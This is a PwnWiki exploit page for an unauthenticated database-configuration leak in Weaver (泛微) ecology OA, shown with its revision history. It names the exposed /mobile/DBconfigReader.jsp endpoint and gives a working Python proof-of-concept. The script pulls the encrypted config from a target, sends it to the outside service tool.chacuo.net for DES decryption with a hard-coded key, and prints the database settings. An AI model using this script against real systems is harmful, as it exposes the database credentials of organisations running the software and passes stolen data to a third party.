Difference between revisions of "泛微ecology OA數據庫配置信息洩露"

From PwnWiki
(Created page with "<languages /> <translate> ==利用前提== /mobile/DBconfigReader.jsp存在未授權訪問。 </translate> ==POC== <pre> import base64 import requests import ast def req(ur...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==利用前提==
+
==利用前提== <!--T:1-->
 
/mobile/DBconfigReader.jsp存在未授權訪問。
 
/mobile/DBconfigReader.jsp存在未授權訪問。
 
</translate>
 
</translate>

Latest revision as of 10:25, 11 March 2021

Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎ • ‎中文(繁體)‎

利用前提

/mobile/DBconfigReader.jsp存在未授權訪問。

POC

import base64
import requests
import ast
 
def req(url):
    headers =  {
        'Content-Type':'application/x-www-form-urlencoded',
        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    }
 
    r1 = requests.get(url,headers=headers).content
    s = r1.replace('\r\n','')
    res1 = base64.b64encode(s)
     
    postdata = {
        'data':res1,
        'type':'des',
        'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'
    }
    u = 'http://tool.chacuo.net/cryptdes'
    r2 = requests.post(u,data=postdata,headers=headers).content
    res2 = ast.literal_eval(r2)
     
    return res2['data']
 
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'
print req(url)
Retrieved from "https://pwnwiki.com/index.php?title=泛微ecology_OA數據庫配置信息洩露&oldid=318"